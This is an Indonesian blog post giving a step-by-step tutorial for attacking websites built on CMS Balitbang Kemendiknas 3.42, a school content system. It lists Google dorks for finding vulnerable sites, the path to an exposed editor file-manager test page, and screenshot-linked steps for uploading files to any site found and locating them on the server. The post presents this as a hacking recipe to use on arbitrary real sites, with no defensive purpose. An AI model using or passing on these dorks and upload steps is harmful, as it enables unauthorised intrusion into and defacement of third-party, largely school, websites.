Namun CMS buatan Indonesia ini masih mempunyai kelemahan/bug. Nah, dalam hal ini saya akan memberi tahu cara menemukan bug itu yang saya kutip dari Inj3ct0r .Mari kita simak secara seksama. Cekibroott !
CMS Balitbang Kemendiknas 3.42
Dork :
inurl:"/html/siswa.php?"
inurl:"/html/alumni.php?"
inurl:"/html/guru.php?"
Exploit :
http://public_html/dir/editor/filemanager/connectors/test.html
1). Masukan salah satu dork diatas untuk mencari bug pada CMS Balitbang
2). Kemudian pilih salah satu website dari hasil pencarian menggunakan dork tersebut
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNcEYXHlhCBL96J7kDSmWgbmPn2lF61ZZ4gNvHRFuZECngi1g6Q3yNvuiRkyGDq4YtvpwG7aec93A_-YcHkSiEUhcW3Yg_7ZOWTzuzjF-B7PcNnq-GxI1J3_8_GsWZNWoNoeJU38jXH4Ip/s400/CMS+Balitbang+1.png
3). Tampilan awal web target.
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN-4LpoFQsXbOj0CqvR4cwuC2LhQCxzwpWFJIkSl79Q_L4Qv9LjjuCse51O3HpUOPFWj80uhbM6A1dh-SSgsOD0g1rJivsIirZIRhNRkvG7cdVkx-zIJ-l807wqJjgvvpvluEBBBnwUHi9/s400/CMS+Balitbang+2.png
4). Setelah itu kita masukan exploit untuk CMS Balitbang pada url target di addressbar lalu tekan Enter.
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZl7mYHNwWZP-WITRHTusKLsKNa1kJO3uyThM7YlxRIBCXFYXindsWW3KW8GyyMq3cb8yusuAxRcqy3sHFLtulmIcX0Bx80toK7v6SEtbga-0eu-60cUGF_AxLr17K3f1UmKOS2ZL5UkJc/s400/CMS+Balitbang+3.png
5). Maka nanti tampilannya akan seperti ini :
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjcs4oeoRLuaxazKzK0swfQaa9tgjLDkMM06QL6A64jg24qHnKMoL5M-S8W2sosXAEz0aWsdy0aCHa6eCEX6h-PkoixYd-eO1tDwvNZOJbluEOrrLmGXmeUWEk8J6nY5xsjW3zD5w3PrJc/s400/CMS+Balitbang+4.png
6). Ubah menu ASP menjadi PHP dan selanjutnya kita pilih file yang akan kita sisipkan kedalam web target.
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidXA6hs7cgAADQhHC0si1lK_233zOCgHPalAMLtQCe6TwbsP3kAfA1Hp3uo5_nwcFywMLuIT3Ghhd-QhATxlph1X7CBnOtMJ6I2plPKtt_KJ6mIQ-uHTv7LT9bjmjOb5KGnPp2qKvp75DW/s400/CMS+Balitbang+5.png
Catatan :
File yang bisa disisipkan hanya file yang berekstensi .txt
7). Jika file sukses terupload, maka akan tampil seperti dibawah ini.
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKZK_5GGAleRVkxv7iznFp7Jw1fnAGug1zx2_Ld3wWjytnPzZmnXp0FhyKXBoW8_zUr_Lso5RD4N6voSyT-NuFLGQuByZ1wEmx2qDAx5_P2CmmDZj1wobl2LmrsrTdqmWVQeGs4Oc8aPEL/s400/CMS+Balitbang+6.png
8). Setelah itu tinggal kita cari file yang disisipkan ke dalam web tersebut dan taraaa...
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEJ4rlAU90aas05yzwpZXIZD-9f3gpjuGjLdoDZZsb9TGXZ5BodV3SzW67Nc_CbXn5-3ioHQ9GR6jrbrGhyA1YDRQgpZOg2XXSNAzaDroZw8nvlaGKfxW16hCv2T6gOjSd9UpoeebxznE7/s400/CMS+Balitbang+7.png
Catatan :
File akan berada disini, Contoh : http://target.com/userfiles/file/Nama_File.txt
Gimana, mudahkan caranya? Sekian dulu tutorial dari saya kali ini
Sumber : Cirebon Cyber4rt
Posted By 
Tidak ada komentar:
Posting Komentar